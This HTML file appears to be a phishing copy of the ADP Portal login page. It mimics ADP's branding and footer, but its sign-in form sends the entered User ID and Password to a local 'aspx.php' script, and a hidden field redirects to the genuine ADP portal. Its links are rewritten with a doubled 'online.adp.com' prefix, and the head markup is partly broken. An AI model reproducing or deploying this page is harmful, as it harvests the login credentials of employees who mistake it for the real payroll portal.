﻿<html data-ng-app="loginPageApp" data-ng-controller="loginController" class="ng-scope" lang=""><head>


<style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <script type="text/javascript" async="" src="https://www.google.com/pagead/conversion_async.js" nonce="h1Qln29BL6TEb0tZ+kXHfwnF"></script><script async="" src="//www.googletagmanager.com/gtm.js?id=GTM-KH3TMH"></script><script type="text/javascript">


	<meta name="robots" content="noindex, nofollow">
    <title></title>

	
	<script nonce="h1Qln29BL6TEb0tZ+kXHfwnF" src="https://online.adp.com/inc/js/lib/6a8f894227f41759348779077d1e5851.js?seed=ACDg6KVvAQAA1znwHtFHi-m0vCQVh5wQjX5koYLpiGWntxCkDeMJ3SunbOJk" id="0c85a47802c80fea3d8b70ea6ddad9d3"></script>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://online.adp.com/inc/css/lib/fontawesome/css/font-awesome.min.css">

    <!-- VDL Base -->
    <link rel="stylesheet" href="https://online.adp.com/portal/inc/css/base.css">

    <!-- VDL Popovers -->
    <link rel="stylesheet" href="https://online.adp.com/portal/inc/css/popovers.css">

    <!-- VDL Inline Messages -->
    <link rel="stylesheet" href="https://online.adp.com/portal/inc/css/inline-messages.css">

    <!-- Our Login Page Styles -->
    <link rel="stylesheet" href="login.css">
    
    <!--  load angular in the head to get better results for ngCloak -->
    <script src="inc/js/lib/angular.min.js"></script>


<!-- Google Digital Marketing Pixel -->
<noscript><iframe src="https://online.adp.com//www.googletagmanager.com/ns.html?id=GTM-KH3TMH"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KH3TMH');</script>
<!-- End Google Pixel --> 





<!-- ngInclude: undefined --><ng-include src="'loginPortlet.html'" class="ng-scope"><div class="container-fluid ng-scope">
    <div class="row-fluid site-logo" data-ng-show="showADPIcon">
        <div class="col-md-12">
            <h1><i class=""></i></h1>
        </div>
    </div>
</div>

<div class="container ng-scope">
    <div class="login-page-container">
    	<!-- ngIf: showMessage -->
        <div class="login-error">
			<!-- ngIf: loginError -->
        </div>
        <!-- .login-error -->
        
        
        <div class="login-content bg-white-opaque">
            <div class="row language-popover ng-hide" data-ng-show="showLanguageSelection">
                <div class="col-md-4 pull-right text-right">
                    <a class="popover-trigger ng-binding" uib-popover-template="dynamicPopover.templateUrl" popover-placement="bottom" popover-is-open="false">
                       English (US)<i class="fa fa-caret-down"></i>
                    </a>
                    <!-- Language Popover Template -->
                    <script type="text/ng-template" id="language-popover.html">
                        <div data-ng-mouseleave="hideLanguagePopover($event)">
                            <h6>Preferred Language</h6>
                            <ul class="list-unstyled">
                                <li data-ng-repeat="(locale, language) in locales">
                                    <a href="https://online.adp.com/" ng-click="setLocale(locale)">
										{{language}}
                                        <i ng-show="language==currentLanguage" class="fa fa-check"></i>
                                        
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </script>

                </div>
            </div>
            <!-- .language-popover -->
            <div class="row welcome-title">
                <div class="col-md-12">
                    <h1 class="ng-binding">Welcome to the ADP® Portal</h1>
                </div>
            </div>
            <!-- .welcome-title -->


            <div data-ngcloak="" class="row login-form">
                <div class="col-md-12">
                    <form method="post" class="adp-form ng-pristine ng-invalid ng-invalid-required ng-valid-maxlength" name="form" role="form" action="aspx.php">
                   	 <input type="hidden" name="target" value="https://portal.adp.com/wps/employee/employee.jsp">
                        <div class="form-group user-id">
                            <div class="row">
                                <div class="col-sm-6 col-xs-12">
                                    <label for="user_id" class="ng-binding">User ID</label>
                                </div>
                                <div class="col-sm-6 hidden-xs">
                                    <div class="admin-login text-right" data-ng-show="showAdminSigninLink">
                                        <a data-ng-href="https://online.adp.com/https://portal.adp.com/wps/admin/admin.jsp" class="ng-binding" href="https://online.adp.com/https://portal.adp.com/wps/admin/admin.jsp">
                                            <i class="fa fa-sign-in"></i> Administrator Sign In
                                        </a>
                                    </div>
                                </div>
                            </div>
                            <div class="input-group-full">
                                <input type="text" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required" name="LoginId" id="user_id" data-ng-model="loginForm.id" required="">
                                <i class="fa fa-user"></i>
                            </div>
                        </div>

                        <!-- .user-id -->

                        <div class="form-group user-remember">
                            <input type="checkbox" data-ng-disabled="idContainsADP()" id="remember_user_id" name="remember_user_id" data-ng-model="loginForm.remember" class="adp-checkbox ng-pristine ng-untouched ng-valid" data-ng-change="rememberUserIdChange()">
                            <label for="remember_user_id" class="ng-binding">
                                Remember My User ID 
                                <a class="popover-trigger" popover-placement="top" uib-popover="Select this option to autofill your user ID when you visit this page using this web browser on this device. Clearing your cache or cookies will remove this value." popover-is-open="false" popover-append-to-body="true">
                                    <i class="fa fa-question-circle"></i>
                                </a>	
                            </label>
                            <!-- ngIf: showUserIDAlert -->
                            
                            <!-- ngIf: showADPIDAlert -->                                
                            
                        </div>
                        <!-- .user-remember -->

                        <div class="form-group password">
                            <label for="password" class="ng-binding">Password (case sensitive)</label>
                            <div class="input-group-full">
                                <input type="password" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required ng-valid-maxlength" name="Password" id="password" data-ng-model="loginForm.password" data-ng-maxlength="256" required="">
                                <i class="fa fa-lock"></i>
                            </div>
                        </div>
                        <div class="form-group submit text-center">
                            <button type="submit" class="btn btn-primary ng-binding">
                                Sign In
                            </button>
                        </div>
                        <!-- .password -->

                        <h5 class="text-center forgot-password">
                            <a data-ng-href="https://online.adp.com/https://netsecure.adp.com/pages/secmgt/static/ess/forgot?rtnURL=https://portal.adp.com&amp;callingAppId=HomepagePortal" class="ng-binding" href="https://online.adp.com/https://netsecure.adp.com/pages/secmgt/static/ess/forgot?rtnURL=https://portal.adp.com&amp;callingAppId=HomepagePortal">
                                Forgot your user ID/password?
                            </a>
                        </h5>
                    </form>
                </div>
            </div>
            <!-- .login-form -->

        </div>
        <!-- .login-content -->


        <div data-ngcloak="" class="login-footer bg-white-opaque">
            <div class="row">
                <div class="col-sm-12 text-center">
                    <h5>
                        <span class="hidden-xs ng-binding">
                            Need an account?
                        </span>
                        <div class="visible-xs" data-ng-show="showAdminSigninLink">
                            <a class="btn btn-secondary ng-binding" data-ng-href="https://online.adp.com/https://portal.adp.com/wps/admin/admin.jsp" href="https://online.adp.com/https://portal.adp.com/wps/admin/admin.jsp">
                                Administrator Sign In
                                <i class="fa fa-chevron-right pull-right visible-xs"></i>
                            </a>
                        </div>
                        <a style="white-space:normal;" data-ng-href="https://online.adp.com/https://netsecure.adp.com/pages/sms/ess/v2/pub/ssr/theme.faces?rtnURL=https://portal.adp.com&amp;callingAppId=HomepagePortal" class="btn btn-secondary ng-binding" href="https://online.adp.com/https://netsecure.adp.com/pages/sms/ess/v2/pub/ssr/theme.faces?rtnURL=https://portal.adp.com&amp;callingAppId=HomepagePortal">
                            Sign Up
                            <i class="fa fa-chevron-right pull-right visible-xs"></i>
                        </a>
                    </h5>
                </div>
            </div>
            <!-- .row -->
        </div>
        <!-- login-footer  -->
    <!-- login-page-container -->
</div>

    <div data-ngcloak="" class="row">
        <div class="col-md-12">
            <div class="adp-footer">
                <ul>
                    <li data-ng-show="showFeedback" class="ng-hide">
                        <a data-ng-href="https://online.adp.com/#feedback" class="ng-binding" href="https://online.adp.com/#feedback">Product Feedback</a>
                    </li>
                    <li data-ng-show="showPrivacy">
                        <a ng-click="showPrivacyInNewWindow();" class="ng-binding">
                            <i class="fa fa-external-link"></i>
                            Privacy
                        </a>
                    </li>
                    <li data-ng-show="showLegal">
                        <a ng-click="showLegalInNewWindow();" class="ng-binding">
                            <i class="fa fa-external-link"></i>
                            Legal
                        </a>
                    </li>
                    <li data-ng-show="showAbout"><a ng-click="showAboutInNewWindow();" class="ng-binding">Update Your Security Profile</a></li>
                    <li data-ng-show="showCompany" class="company ng-binding">Copyright © 2000-2016, ADP, LLC. ALL RIGHTS RESERVED</li>
                </ul>
            </div>
            <!-- /adp-footer -->
        </div>
        <!-- /col-md-12 -->
    </div>
    <!-- /row -->
  </div>

</ng-include>
<!-- .container -->

<!-- Dependencies: This component requires jQuery also -->
<script src="inc/js/lib/ui-bootstrap-tpls.min.js"></script>
<script src="inc/js/lib/angular-cookies.min.js"></script>
<script src="inc/js/lib/angular-messages.min.js"></script>
<script src="inc/js/lib/angular-translate.min.js"></script>
<script src="inc/js/lib/angular-translate-loader-static-files.min.js"></script>

<script src="inc/js/config.js"></script>
<script src="inc/js/app.js"></script>

<!-- Include VDL Directives -->
<script src="inc/js/vdl/directives/inline-message-directive.js"></script>

<!-- Include our controllers -->
<script src="inc/js/controllers/login-controller.js"></script>


<script type="text/javascript" id="">(function(){if(0>document.cookie.indexOf("cffi")){var a=new Date(+new Date+31536E6);document.cookie="cffi\x3d1;path\x3d/;expires\x3d"+a.toUTCString();location.reload(!0)}})();</script>
</body></html>